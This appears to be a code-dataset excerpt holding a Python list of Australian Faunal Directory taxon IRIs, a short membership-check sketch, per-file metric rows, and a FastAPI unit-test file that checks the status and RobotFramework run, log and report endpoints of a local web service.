"https://test-idafd.biodiversity.org.au/name/afd/70195991",
"https://test-idafd.biodiversity.org.au/name/afd/70195992",
"https://test-idafd.biodiversity.org.au/name/afd/70197086",
"https://test-idafd.biodiversity.org.au/name/afd/70197169",
"https://test-idafd.biodiversity.org.au/name/afd/70197172",
"https://test-idafd.biodiversity.org.au/name/afd/70197262",
"https://test-idafd.biodiversity.org.au/name/afd/70198528",
"https://test-idafd.biodiversity.org.au/name/afd/70199327",
"https://test-idafd.biodiversity.org.au/name/afd/70199426",
"https://test-idafd.biodiversity.org.au/name/afd/70199430",
"https://test-idafd.biodiversity.org.au/name/afd/70199663",
"https://test-idafd.biodiversity.org.au/name/afd/70199746",
"https://test-idafd.biodiversity.org.au/name/afd/70202632",
"https://test-idafd.biodiversity.org.au/name/afd/70202636",
"https://test-idafd.biodiversity.org.au/name/afd/70202637",
"https://test-idafd.biodiversity.org.au/name/afd/70202993",
"https://test-idafd.biodiversity.org.au/name/afd/70202998",
"https://test-idafd.biodiversity.org.au/name/afd/70203007",
"https://test-idafd.biodiversity.org.au/name/afd/70203256",
"https://test-idafd.biodiversity.org.au/name/afd/70204649",
"https://test-idafd.biodiversity.org.au/name/afd/70204650",
"https://test-idafd.biodiversity.org.au/name/afd/70204655",
"https://test-idafd.biodiversity.org.au/name/afd/70204658",
"https://test-idafd.biodiversity.org.au/name/afd/70207034",
"https://test-idafd.biodiversity.org.au/name/afd/70208223",
"https://test-idafd.biodiversity.org.au/name/afd/70208224",
"https://test-idafd.biodiversity.org.au/name/afd/70208227",
"https://test-idafd.biodiversity.org.au/name/afd/70214460",
"https://test-idafd.biodiversity.org.au/name/afd/70214469",
"https://test-idafd.biodiversity.org.au/name/afd/70214498",
"https://test-idafd.biodiversity.org.au/name/afd/70214833",
"https://test-idafd.biodiversity.org.au/name/afd/70215602",
"https://test-idafd.biodiversity.org.au/name/afd/70216090",
"https://test-idafd.biodiversity.org.au/name/afd/70216176",
"https://test-idafd.biodiversity.org.au/name/afd/70216838",
"https://test-idafd.biodiversity.org.au/name/afd/70216839",
"https://test-idafd.biodiversity.org.au/name/afd/70216888",
"https://test-idafd.biodiversity.org.au/name/afd/70217012",
"https://test-idafd.biodiversity.org.au/name/afd/70217319",
"https://test-idafd.biodiversity.org.au/name/afd/70217838",
"https://test-idafd.biodiversity.org.au/name/afd/70220134",
"https://test-idafd.biodiversity.org.au/name/afd/70220995",
"https://test-idafd.biodiversity.org.au/name/afd/70222918",
"https://test-idafd.biodiversity.org.au/name/afd/70222925",
"https://test-idafd.biodiversity.org.au/name/afd/70223068",
"https://test-idafd.biodiversity.org.au/name/afd/70223300",
"https://test-idafd.biodiversity.org.au/name/afd/70224616",
"https://test-idafd.biodiversity.org.au/name/afd/70226370",
"https://test-idafd.biodiversity.org.au/name/afd/70227478",
"https://test-idafd.biodiversity.org.au/name/afd/70227609",
"https://test-idafd.biodiversity.org.au/name/afd/70227610",
"https://test-idafd.biodiversity.org.au/name/afd/70227612",
"https://test-idafd.biodiversity.org.au/name/afd/70227613",
"https://test-idafd.biodiversity.org.au/name/afd/70227615",
"https://test-idafd.biodiversity.org.au/name/afd/70227616",
"https://test-idafd.biodiversity.org.au/name/afd/70227617",
"https://test-idafd.biodiversity.org.au/name/afd/70227618",
"https://test-idafd.biodiversity.org.au/name/afd/70227620",
"https://test-idafd.biodiversity.org.au/name/afd/70227621",
"https://test-idafd.biodiversity.org.au/name/afd/70227622",
"https://test-idafd.biodiversity.org.au/name/afd/70227623",
"https://test-idafd.biodiversity.org.au/name/afd/70227624",
"https://test-idafd.biodiversity.org.au/name/afd/70227625",
"https://test-idafd.biodiversity.org.au/name/afd/70227905",
"https://test-idafd.biodiversity.org.au/name/afd/70228973",
"https://test-idafd.biodiversity.org.au/name/afd/70229034",
"https://test-idafd.biodiversity.org.au/name/afd/70229898",
"https://test-idafd.biodiversity.org.au/name/afd/70229899",
"https://test-idafd.biodiversity.org.au/name/afd/70229924",
"https://test-idafd.biodiversity.org.au/name/afd/70229928",
"https://test-idafd.biodiversity.org.au/name/afd/70230322",
"https://test-idafd.biodiversity.org.au/name/afd/70230324",
"https://test-idafd.biodiversity.org.au/name/afd/70231054",
"https://test-idafd.biodiversity.org.au/name/afd/70231058",
"https://test-idafd.biodiversity.org.au/name/afd/70231088",
"https://test-idafd.biodiversity.org.au/name/afd/70232375",
"https://test-idafd.biodiversity.org.au/name/afd/70232451",
"https://test-idafd.biodiversity.org.au/name/afd/70232583",
"https://test-idafd.biodiversity.org.au/name/afd/70233031",
"https://test-idafd.biodiversity.org.au/name/afd/70234546",
"https://test-idafd.biodiversity.org.au/name/afd/70235188",
"https://test-idafd.biodiversity.org.au/name/afd/70239683",
"https://test-idafd.biodiversity.org.au/name/afd/70241451",
"https://test-idafd.biodiversity.org.au/name/afd/70244527",
"https://test-idafd.biodiversity.org.au/name/afd/70244528",
"https://test-idafd.biodiversity.org.au/name/afd/70246906",
"https://test-idafd.biodiversity.org.au/name/afd/70246921",
"https://test-idafd.biodiversity.org.au/name/afd/70248191",
"https://test-idafd.biodiversity.org.au/name/afd/70248815",
"https://test-idafd.biodiversity.org.au/name/afd/70248846",
"https://test-idafd.biodiversity.org.au/name/afd/70250437",
"https://test-idafd.biodiversity.org.au/name/afd/70251591",
"https://test-idafd.biodiversity.org.au/name/afd/70251592",
"https://test-idafd.biodiversity.org.au/name/afd/70251593",
"https://test-idafd.biodiversity.org.au/name/afd/70251594",
"https://test-idafd.biodiversity.org.au/name/afd/70251595",
"https://test-idafd.biodiversity.org.au/name/afd/70251596",
"https://test-idafd.biodiversity.org.au/name/afd/70251813",
"https://test-idafd.biodiversity.org.au/name/afd/70252582",
"https://test-idafd.biodiversity.org.au/name/afd/70252585",
"https://test-idafd.biodiversity.org.au/name/afd/70252798",
"https://test-idafd.biodiversity.org.au/name/afd/70253122",
"https://test-idafd.biodiversity.org.au/name/afd/70253249",
"https://test-idafd.biodiversity.org.au/name/afd/70254508",
"https://test-idafd.biodiversity.org.au/name/afd/70256724",
"https://test-idafd.biodiversity.org.au/name/afd/70256790",
"https://test-idafd.biodiversity.org.au/name/afd/70256793",
"https://test-idafd.biodiversity.org.au/name/afd/70258140",
"https://test-idafd.biodiversity.org.au/name/afd/70258503",
"https://test-idafd.biodiversity.org.au/name/afd/70260063",
"https://test-idafd.biodiversity.org.au/name/afd/70260064",
"https://test-idafd.biodiversity.org.au/name/afd/70260071",
"https://test-idafd.biodiversity.org.au/name/afd/70261170",
"https://test-idafd.biodiversity.org.au/name/afd/70261287",
"https://test-idafd.biodiversity.org.au/name/afd/70263603",
"https://test-idafd.biodiversity.org.au/name/afd/70263610",
"https://test-idafd.biodiversity.org.au/name/afd/70264561",
"https://test-idafd.biodiversity.org.au/name/afd/70264569",
"https://test-idafd.biodiversity.org.au/name/afd/70264662",
"https://test-idafd.biodiversity.org.au/name/afd/70265111",
"https://test-idafd.biodiversity.org.au/name/afd/70265123",
"https://test-idafd.biodiversity.org.au/name/afd/70265124",
"https://test-idafd.biodiversity.org.au/name/afd/70265184",
"https://test-idafd.biodiversity.org.au/name/afd/70266881",
"https://test-idafd.biodiversity.org.au/name/afd/70268851",
"https://test-idafd.biodiversity.org.au/name/afd/70270743",
"https://test-idafd.biodiversity.org.au/name/afd/70271780",
"https://test-idafd.biodiversity.org.au/name/afd/70271857",
"https://test-idafd.biodiversity.org.au/name/afd/70271859",
"https://test-idafd.biodiversity.org.au/name/afd/70272009",
"https://test-idafd.biodiversity.org.au/name/afd/70273308",
"https://test-idafd.biodiversity.org.au/name/afd/70273330",
"https://test-idafd.biodiversity.org.au/name/afd/70273907",
"https://test-idafd.biodiversity.org.au/name/afd/70274243",
"https://test-idafd.biodiversity.org.au/name/afd/70274706",
"https://test-idafd.biodiversity.org.au/name/afd/70274719",
"https://test-idafd.biodiversity.org.au/name/afd/70277849",
"https://test-idafd.biodiversity.org.au/name/afd/70277851",
"https://test-idafd.biodiversity.org.au/name/afd/70285187",
"https://test-idafd.biodiversity.org.au/name/afd/70285194",
"https://test-idafd.biodiversity.org.au/name/afd/70285198",
"https://test-idafd.biodiversity.org.au/name/afd/70285584",
"https://test-idafd.biodiversity.org.au/name/afd/70285746",
"https://test-idafd.biodiversity.org.au/name/afd/70285750",
"https://test-idafd.biodiversity.org.au/name/afd/70286324",
"https://test-idafd.biodiversity.org.au/name/afd/70287749",
"https://test-idafd.biodiversity.org.au/name/afd/70287751",
"https://test-idafd.biodiversity.org.au/name/afd/70287816",
"https://test-idafd.biodiversity.org.au/name/afd/70287833",
"https://test-idafd.biodiversity.org.au/name/afd/70288732",
"https://test-idafd.biodiversity.org.au/name/afd/70289475",
"https://test-idafd.biodiversity.org.au/name/afd/70289476",
"https://test-idafd.biodiversity.org.au/name/afd/70289479",
"https://test-idafd.biodiversity.org.au/name/afd/70289480",
"https://test-idafd.biodiversity.org.au/name/afd/70289481",
"https://test-idafd.biodiversity.org.au/name/afd/70289486",
"https://test-idafd.biodiversity.org.au/name/afd/70290449",
"https://test-idafd.biodiversity.org.au/name/afd/70290501",
"https://test-idafd.biodiversity.org.au/name/afd/70292085",
"https://test-idafd.biodiversity.org.au/name/afd/70292086",
"https://test-idafd.biodiversity.org.au/name/afd/70292087",
"https://test-idafd.biodiversity.org.au/name/afd/70292088",
"https://test-idafd.biodiversity.org.au/name/afd/70295160",
"https://test-idafd.biodiversity.org.au/name/afd/70295161",
"https://test-idafd.biodiversity.org.au/name/afd/70296349",
"https://test-idafd.biodiversity.org.au/name/afd/70297596",
"https://test-idafd.biodiversity.org.au/name/afd/70297628",
"https://test-idafd.biodiversity.org.au/name/afd/70298163",
"https://test-idafd.biodiversity.org.au/name/afd/70298233",
"https://test-idafd.biodiversity.org.au/name/afd/70298740",
"https://test-idafd.biodiversity.org.au/name/afd/70299515",
"https://test-idafd.biodiversity.org.au/name/afd/70299516",
"https://test-idafd.biodiversity.org.au/name/afd/70299517",
"https://test-idafd.biodiversity.org.au/name/afd/70299518",
"https://test-idafd.biodiversity.org.au/name/afd/70299519",
"https://test-idafd.biodiversity.org.au/name/afd/70299520",
"https://test-idafd.biodiversity.org.au/name/afd/70299521",
"https://test-idafd.biodiversity.org.au/name/afd/70300122",
"https://test-idafd.biodiversity.org.au/name/afd/70300340",
"https://test-idafd.biodiversity.org.au/name/afd/70300451",
"https://test-idafd.biodiversity.org.au/name/afd/70300457",
"https://test-idafd.biodiversity.org.au/name/afd/70300965",
"https://test-idafd.biodiversity.org.au/name/afd/70302014",
"https://test-idafd.biodiversity.org.au/name/afd/70302016",
"https://test-idafd.biodiversity.org.au/name/afd/70302020",
"https://test-idafd.biodiversity.org.au/name/afd/70302022",
"https://test-idafd.biodiversity.org.au/name/afd/70302024",
"https://test-idafd.biodiversity.org.au/name/afd/70302102",
"https://test-idafd.biodiversity.org.au/name/afd/70302288",
"https://test-idafd.biodiversity.org.au/name/afd/70303806",
"https://test-idafd.biodiversity.org.au/name/afd/70303807",
"https://test-idafd.biodiversity.org.au/name/afd/70304409",
"https://test-idafd.biodiversity.org.au/name/afd/70305109",
"https://test-idafd.biodiversity.org.au/name/afd/70305487",
"https://test-idafd.biodiversity.org.au/name/afd/70306547",
"https://test-idafd.biodiversity.org.au/name/afd/70311479",
"https://test-idafd.biodiversity.org.au/name/afd/70311489",
"https://test-idafd.biodiversity.org.au/name/afd/70312855",
"https://test-idafd.biodiversity.org.au/name/afd/70312859",
"https://test-idafd.biodiversity.org.au/name/afd/70312865",
"https://test-idafd.biodiversity.org.au/name/afd/70312866",
"https://test-idafd.biodiversity.org.au/name/afd/70312867",
"https://test-idafd.biodiversity.org.au/name/afd/70312876",
"https://test-idafd.biodiversity.org.au/name/afd/70312878",
"https://test-idafd.biodiversity.org.au/name/afd/70312882",
"https://test-idafd.biodiversity.org.au/name/afd/70313621",
"https://test-idafd.biodiversity.org.au/name/afd/70313626",
"https://test-idafd.biodiversity.org.au/name/afd/70314474",
"https://test-idafd.biodiversity.org.au/name/afd/70315958",
"https://test-idafd.biodiversity.org.au/name/afd/70316947",
"https://test-idafd.biodiversity.org.au/name/afd/70316953",
"https://test-idafd.biodiversity.org.au/name/afd/70317053",
"https://test-idafd.biodiversity.org.au/name/afd/70317056",
"https://test-idafd.biodiversity.org.au/name/afd/70317058",
"https://test-idafd.biodiversity.org.au/name/afd/70317059",
"https://test-idafd.biodiversity.org.au/name/afd/70317254",
"https://test-idafd.biodiversity.org.au/name/afd/70322776",
"https://test-idafd.biodiversity.org.au/name/afd/70322779",
"https://test-idafd.biodiversity.org.au/name/afd/70323779",
"https://test-idafd.biodiversity.org.au/name/afd/70324406",
"https://test-idafd.biodiversity.org.au/name/afd/70324452",
"https://test-idafd.biodiversity.org.au/name/afd/70324453",
"https://test-idafd.biodiversity.org.au/name/afd/70324458",
"https://test-idafd.biodiversity.org.au/name/afd/70325324",
"https://test-idafd.biodiversity.org.au/name/afd/70325733",
"https://test-idafd.biodiversity.org.au/name/afd/70327447",
"https://test-idafd.biodiversity.org.au/name/afd/70329302",
"https://test-idafd.biodiversity.org.au/name/afd/70330861",
"https://test-idafd.biodiversity.org.au/name/afd/70331275",
"https://test-idafd.biodiversity.org.au/name/afd/70333752",
"https://test-idafd.biodiversity.org.au/name/afd/70334439",
"https://test-idafd.biodiversity.org.au/name/afd/70335813",
"https://test-idafd.biodiversity.org.au/name/afd/70335929",
"https://test-idafd.biodiversity.org.au/name/afd/70342130",
"https://test-idafd.biodiversity.org.au/name/afd/70345235",
"https://test-idafd.biodiversity.org.au/name/afd/70345238",
"https://test-idafd.biodiversity.org.au/name/afd/70345433",
"https://test-idafd.biodiversity.org.au/name/afd/70346174",
"https://test-idafd.biodiversity.org.au/name/afd/70346208",
"https://test-idafd.biodiversity.org.au/name/afd/70346234",
"https://test-idafd.biodiversity.org.au/name/afd/70346268",
"https://test-idafd.biodiversity.org.au/name/afd/70346281",
"https://test-idafd.biodiversity.org.au/name/afd/70346329",
"https://test-idafd.biodiversity.org.au/name/afd/70346335",
"https://test-idafd.biodiversity.org.au/name/afd/70347205",
"https://test-idafd.biodiversity.org.au/name/afd/70347698",
"https://test-idafd.biodiversity.org.au/name/afd/70349617",
"https://test-idafd.biodiversity.org.au/name/afd/70349619",
"https://test-idafd.biodiversity.org.au/name/afd/70349808",
"https://test-idafd.biodiversity.org.au/name/afd/70350130",
"https://test-idafd.biodiversity.org.au/name/afd/70350988",
"https://test-idafd.biodiversity.org.au/name/afd/70352881",
"https://test-idafd.biodiversity.org.au/name/afd/70352885",
"https://test-idafd.biodiversity.org.au/name/afd/70352894",
"https://test-idafd.biodiversity.org.au/name/afd/70355354",
"https://test-idafd.biodiversity.org.au/name/afd/70355444",
"https://test-idafd.biodiversity.org.au/name/afd/70356809",
"https://test-idafd.biodiversity.org.au/name/afd/70356810",
"https://test-idafd.biodiversity.org.au/name/afd/70357156",
"https://test-idafd.biodiversity.org.au/name/afd/70360348",
"https://test-idafd.biodiversity.org.au/name/afd/70360885",
"https://test-idafd.biodiversity.org.au/name/afd/70360892",
"https://test-idafd.biodiversity.org.au/name/afd/70361265",
"https://test-idafd.biodiversity.org.au/name/afd/70362757",
"https://test-idafd.biodiversity.org.au/name/afd/70365077",
"https://test-idafd.biodiversity.org.au/name/afd/70366346",
"https://test-idafd.biodiversity.org.au/name/afd/70367067",
"https://test-idafd.biodiversity.org.au/name/afd/70368015",
"https://test-idafd.biodiversity.org.au/name/afd/70368163",
"https://test-idafd.biodiversity.org.au/name/afd/70368935",
"https://test-idafd.biodiversity.org.au/name/afd/70373790",
"https://test-idafd.biodiversity.org.au/name/afd/70376631",
"https://test-idafd.biodiversity.org.au/name/afd/70377818",
"https://test-idafd.biodiversity.org.au/name/afd/70378180",
"https://test-idafd.biodiversity.org.au/name/afd/70378181",
"https://test-idafd.biodiversity.org.au/name/afd/70378420",
"https://test-idafd.biodiversity.org.au/name/afd/70379814",
"https://test-idafd.biodiversity.org.au/name/afd/70380413",
"https://test-idafd.biodiversity.org.au/name/afd/70381780",
"https://test-idafd.biodiversity.org.au/name/afd/70381781",
"https://test-idafd.biodiversity.org.au/name/afd/70381782",
"https://test-idafd.biodiversity.org.au/name/afd/70382107",
"https://test-idafd.biodiversity.org.au/name/afd/70382989",
"https://test-idafd.biodiversity.org.au/name/afd/70383316",
"https://test-idafd.biodiversity.org.au/name/afd/70384107",
"https://test-idafd.biodiversity.org.au/name/afd/70384108",
"https://test-idafd.biodiversity.org.au/name/afd/70384110",
"https://test-idafd.biodiversity.org.au/name/afd/70384115",
"https://test-idafd.biodiversity.org.au/name/afd/70385776",
"https://test-idafd.biodiversity.org.au/name/afd/70386439",
"https://test-idafd.biodiversity.org.au/name/afd/70386757",
"https://test-idafd.biodiversity.org.au/name/afd/70386758",
"https://test-idafd.biodiversity.org.au/name/afd/70387748",
"https://test-idafd.biodiversity.org.au/name/afd/70387753",
"https://test-idafd.biodiversity.org.au/name/afd/70387758",
"https://test-idafd.biodiversity.org.au/name/afd/70387777",
"https://test-idafd.biodiversity.org.au/name/afd/70387785",
"https://test-idafd.biodiversity.org.au/name/afd/70387786",
"https://test-idafd.biodiversity.org.au/name/afd/70387790",
"https://test-idafd.biodiversity.org.au/name/afd/70387796",
"https://test-idafd.biodiversity.org.au/name/afd/70387802",
"https://test-idafd.biodiversity.org.au/name/afd/70387814",
"https://test-idafd.biodiversity.org.au/name/afd/70387825",
"https://test-idafd.biodiversity.org.au/name/afd/70387827",
"https://test-idafd.biodiversity.org.au/name/afd/70387830",
"https://test-idafd.biodiversity.org.au/name/afd/70387831",
"https://test-idafd.biodiversity.org.au/name/afd/70387832",
"https://test-idafd.biodiversity.org.au/name/afd/70387834",
"https://test-idafd.biodiversity.org.au/name/afd/70387849",
"https://test-idafd.biodiversity.org.au/name/afd/70387854",
"https://test-idafd.biodiversity.org.au/name/afd/70388323",
"https://test-idafd.biodiversity.org.au/name/afd/70388364",
"https://test-idafd.biodiversity.org.au/name/afd/70388365",
"https://test-idafd.biodiversity.org.au/name/afd/70389001",
"https://test-idafd.biodiversity.org.au/name/afd/70389257",
"https://test-idafd.biodiversity.org.au/name/afd/70389258",
"https://test-idafd.biodiversity.org.au/name/afd/70389259",
"https://test-idafd.biodiversity.org.au/name/afd/70389524",
"https://test-idafd.biodiversity.org.au/name/afd/70389533",
"https://test-idafd.biodiversity.org.au/name/afd/70393015",
"https://test-idafd.biodiversity.org.au/name/afd/70393185",
"https://test-idafd.biodiversity.org.au/name/afd/70393188",
"https://test-idafd.biodiversity.org.au/name/afd/70393533",
"https://test-idafd.biodiversity.org.au/name/afd/70393537",
"https://test-idafd.biodiversity.org.au/name/afd/70395745",
"https://test-idafd.biodiversity.org.au/name/afd/70397406",
"https://test-idafd.biodiversity.org.au/name/afd/70397409",
"https://test-idafd.biodiversity.org.au/name/afd/70401805",
"https://test-idafd.biodiversity.org.au/name/afd/70404092",
"https://test-idafd.biodiversity.org.au/name/afd/70404580",
"https://test-idafd.biodiversity.org.au/name/afd/70404975",
"https://test-idafd.biodiversity.org.au/name/afd/70404977",
"https://test-idafd.biodiversity.org.au/name/afd/70404979",
"https://test-idafd.biodiversity.org.au/name/afd/70404980",
"https://test-idafd.biodiversity.org.au/name/afd/70404981",
"https://test-idafd.biodiversity.org.au/name/afd/70404982",
"https://test-idafd.biodiversity.org.au/name/afd/70404984",
"https://test-idafd.biodiversity.org.au/name/afd/70404985",
"https://test-idafd.biodiversity.org.au/name/afd/70406086",
"https://test-idafd.biodiversity.org.au/name/afd/70407584",
"https://test-idafd.biodiversity.org.au/name/afd/70408085",
"https://test-idafd.biodiversity.org.au/name/afd/70408100",
"https://test-idafd.biodiversity.org.au/name/afd/70408131",
"https://test-idafd.biodiversity.org.au/name/afd/70408134",
"https://test-idafd.biodiversity.org.au/name/afd/70408595",
"https://test-idafd.biodiversity.org.au/name/afd/70408935",
"https://test-idafd.biodiversity.org.au/name/afd/70408956",
"https://test-idafd.biodiversity.org.au/name/afd/70409735",
"https://test-idafd.biodiversity.org.au/name/afd/70409767",
"https://test-idafd.biodiversity.org.au/name/afd/70411788",
"https://test-idafd.biodiversity.org.au/name/afd/70411799",
"https://test-idafd.biodiversity.org.au/name/afd/70412646",
"https://test-idafd.biodiversity.org.au/name/afd/70413908",
"https://test-idafd.biodiversity.org.au/name/afd/70417610",
"https://test-idafd.biodiversity.org.au/name/afd/70418247",
"https://test-idafd.biodiversity.org.au/name/afd/70418975",
"https://test-idafd.biodiversity.org.au/name/afd/70421266",
"https://test-idafd.biodiversity.org.au/name/afd/70421274",
"https://test-idafd.biodiversity.org.au/name/afd/70422141",
"https://test-idafd.biodiversity.org.au/name/afd/70422144",
"https://test-idafd.biodiversity.org.au/name/afd/70422212",
"https://test-idafd.biodiversity.org.au/name/afd/70422292",
"https://test-idafd.biodiversity.org.au/name/afd/70422369",
"https://test-idafd.biodiversity.org.au/name/afd/70422374",
"https://test-idafd.biodiversity.org.au/name/afd/70422561",
"https://test-idafd.biodiversity.org.au/name/afd/70423636",
"https://test-idafd.biodiversity.org.au/name/afd/70424033",
"https://test-idafd.biodiversity.org.au/name/afd/70424035",
"https://test-idafd.biodiversity.org.au/name/afd/70424571",
"https://test-idafd.biodiversity.org.au/name/afd/70425463",
"https://test-idafd.biodiversity.org.au/name/afd/70427304",
"https://test-idafd.biodiversity.org.au/name/afd/70427979",
"https://test-idafd.biodiversity.org.au/name/afd/70427980",
"https://test-idafd.biodiversity.org.au/name/afd/70428447",
"https://test-idafd.biodiversity.org.au/name/afd/70430090",
"https://test-idafd.biodiversity.org.au/name/afd/70430093",
"https://test-idafd.biodiversity.org.au/name/afd/70430554",
"https://test-idafd.biodiversity.org.au/name/afd/70432923",
"https://test-idafd.biodiversity.org.au/name/afd/70433252",
"https://test-idafd.biodiversity.org.au/name/afd/70433493",
"https://test-idafd.biodiversity.org.au/name/afd/70433509",
"https://test-idafd.biodiversity.org.au/name/afd/70433515",
"https://test-idafd.biodiversity.org.au/name/afd/70433519",
"https://test-idafd.biodiversity.org.au/name/afd/70434370",
"https://test-idafd.biodiversity.org.au/name/afd/70437941",
"https://test-idafd.biodiversity.org.au/name/afd/70438048",
"https://test-idafd.biodiversity.org.au/name/afd/70440034",
"https://test-idafd.biodiversity.org.au/name/afd/70440498",
"https://test-idafd.biodiversity.org.au/name/afd/70444906",
"https://test-idafd.biodiversity.org.au/name/afd/70445431",
"https://test-idafd.biodiversity.org.au/name/afd/70448887",
"https://test-idafd.biodiversity.org.au/name/afd/70449358",
"https://test-idafd.biodiversity.org.au/name/afd/70449359",
"https://test-idafd.biodiversity.org.au/name/afd/70449361",
"https://test-idafd.biodiversity.org.au/name/afd/70449558",
"https://test-idafd.biodiversity.org.au/name/afd/70449562",
"https://test-idafd.biodiversity.org.au/name/afd/70451548",
"https://test-idafd.biodiversity.org.au/name/afd/70451556",
"https://test-idafd.biodiversity.org.au/name/afd/70456220",
"https://test-idafd.biodiversity.org.au/name/afd/70456222",
"https://test-idafd.biodiversity.org.au/name/afd/70456224",
"https://test-idafd.biodiversity.org.au/name/afd/70456226",
"https://test-idafd.biodiversity.org.au/name/afd/70456227",
"https://test-idafd.biodiversity.org.au/name/afd/70456228",
"https://test-idafd.biodiversity.org.au/name/afd/70456237",
"https://test-idafd.biodiversity.org.au/name/afd/70457940",
"https://test-idafd.biodiversity.org.au/name/afd/70463103",
"https://test-idafd.biodiversity.org.au/name/afd/70464994",
"https://test-idafd.biodiversity.org.au/name/afd/70465807",
"https://test-idafd.biodiversity.org.au/name/afd/70465833",
"https://test-idafd.biodiversity.org.au/name/afd/70465843",
"https://test-idafd.biodiversity.org.au/name/afd/70466502",
"https://test-idafd.biodiversity.org.au/name/afd/70467686",
"https://test-idafd.biodiversity.org.au/name/afd/70467687",
"https://test-idafd.biodiversity.org.au/name/afd/70467688",
"https://test-idafd.biodiversity.org.au/name/afd/70468229",
"https://test-idafd.biodiversity.org.au/name/afd/70496191",
]
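The list is a flat collection of taxon IRIs, so a membership check is its natural use. A small sketch follows; the lookup set and helper name are assumptions for illustration, not taken from the client code:

CONSERVATION_LOOKUP = frozenset(CONSERVATION_STATUS_TAXA)

def is_conservation_listed(taxon_iri: str) -> bool:
    """True if the taxon IRI appears in the WA conservation-status list."""
    return taxon_iri in CONSERVATION_LOOKUP

# AFD identifiers can be recovered from the IRI tail if needed:
afd_ids = [iri.rsplit("/", 1)[-1] for iri in CONSERVATION_STATUS_TAXA]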
| 63.777778
| 73
| 0.719164
| 4,441
| 31,570
| 5.111236
| 0.11619
| 0.194678
| 0.302833
| 0.562404
| 0.821975
| 0.821975
| 0.821975
| 0.821975
| 0
| 0
| 0
| 0.134964
| 0.078112
| 31,570
| 495
| 74
| 63.777778
| 0.644963
| 0.003516
| 0
| 0
| 0
| 0
| 0.874082
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
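The pipe-separated numbers above are per-file quality-signal values (line-length statistics, character-class fractions, n-gram duplication rates, and similar). The exact pipeline behind them is not reproduced in this dump; the following is only a rough sketch of two of the simpler signals, under the assumption that words are whitespace-delimited tokens:

import re

def frac_chars_whitespace(text: str) -> float:
    # Fraction of characters that are whitespace.
    return sum(ch.isspace() for ch in text) / len(text) if text else 0.0

def mean_word_length(text: str) -> float:
    # Mean length of whitespace-delimited tokens.
    words = re.findall(r"\S+", text)
    return sum(map(len, words)) / len(words) if words else 0.0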
| 0
| 7
| 6f66d39509b2371343f234d5244ff58766540af6
| 2,112
| py
| Python
| tests/test_app.py
| postadress/robotframework-webservice
| 2fc112b3b4bd7493c6c8cb1e00655b24e20bd1e5
| ["Apache-2.0"] | 5
| 2021-07-04T13:37:02.000Z
| 2021-09-22T15:56:57.000Z
| tests/test_app.py
| postadress/robotframework-webservice
| 2fc112b3b4bd7493c6c8cb1e00655b24e20bd1e5
| ["Apache-2.0"] | null | null | null
| tests/test_app.py
| postadress/robotframework-webservice
| 2fc112b3b4bd7493c6c8cb1e00655b24e20bd1e5
| ["Apache-2.0"] | 1
| 2021-09-07T07:37:30.000Z
| 2021-09-07T07:37:30.000Z
|
from fastapi.testclient import TestClient
import unittest

from RobotFrameworkService.main import app


class EndpointTests(unittest.TestCase):
    def test_is_service_available(self):
        with TestClient(app) as client:
            response = client.get("/status")
            self.assertEqual(200, response.status_code)

    def test_is_robottask_startable(self):
        with TestClient(app) as client:
            response = client.get("/robotframework/run/anotherTask")
            self.assertEqual(200, response.status_code)

    def test_is_robottask_available_with_logs(self):
        with TestClient(app) as client:
            response = client.get("/robotframework/run_and_show/anotherTask")
            self.assertEqual(200, response.status_code)

    def test_is_robottask_available_with_reports(self):
        with TestClient(app) as client:
            response = client.get("/robotframework/run_and_show_report/anotherTask")
            self.assertEqual(200, response.status_code)

    def test_is_robottask_available_with_logs_and_arguments(self):
        with TestClient(app) as client:
            response = client.get("/robotframework/run_and_show/anotherTask?art=tests&description=EreichbarkeitsTestMitLogs")
            self.assertEqual(200, response.status_code)

    def test_is_robottask_available_with_reports_and_arguments(self):
        with TestClient(app) as client:
            response = client.get("/robotframework/run_and_show_report/anotherTask?art=tests&description=FunktionsTestMitReports")
            self.assertEqual(200, response.status_code)

    def test_is_robotlog_available(self):
        with TestClient(app) as client:
            client.get("/robotframework/run/anotherTask")
            response = client.get("/robotframework/show_log/anotherTask")
            self.assertEqual(200, response.status_code)

    def test_is_robotreport_available(self):
        with TestClient(app) as client:
            client.get("/robotframework/run/anotherTask")
            response = client.get("/robotframework/show_report/anotherTask")
            self.assertEqual(200, response.status_code)
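A note on the pattern used throughout the tests above: entering TestClient as a context manager runs the FastAPI app's startup and shutdown events, which a bare TestClient(app).get(...) would skip. A minimal, self-contained sketch of that behavior — the demo app and route here are illustrative, not from the repository:

from fastapi import FastAPI
from fastapi.testclient import TestClient

demo = FastAPI()

@demo.on_event("startup")
def mark_ready():
    # Startup hooks only fire when the client is used as a context manager.
    demo.state.ready = True

@demo.get("/status")
def status():
    return {"ready": getattr(demo.state, "ready", False)}

with TestClient(demo) as client:
    assert client.get("/status").json() == {"ready": True}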
| 41.411765
| 130
| 0.724432
| 241
| 2,112
| 6.112033
| 0.190871
| 0.0611
| 0.14053
| 0.114053
| 0.819416
| 0.819416
| 0.819416
| 0.813306
| 0.813306
| 0.715547
| 0
| 0.01397
| 0.186553
| 2,112
| 50
| 131
| 42.24
| 0.843423
| 0
| 0
| 0.473684
| 0
| 0
| 0.209953
| 0.206635
| 0
| 0
| 0
| 0
| 0.210526
| 1
| 0.210526
| false
| 0
| 0.078947
| 0
| 0.315789
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 7
| 488dc8928c219190e5b4dfbc67d7445b8b3c9373
| 8,007
| py
| Python
| src/transformers/utils/dummy_tokenizers_objects.py
| Yokohide0317/transformers
| 1089c30a4a3c56dcf017e500ba4b44e5c39f68dd
| ["Apache-2.0"] | 1
| 2022-01-22T14:31:15.000Z
| 2022-01-22T14:31:15.000Z
| src/transformers/utils/dummy_tokenizers_objects.py
| Yokohide0317/transformers
| 1089c30a4a3c56dcf017e500ba4b44e5c39f68dd
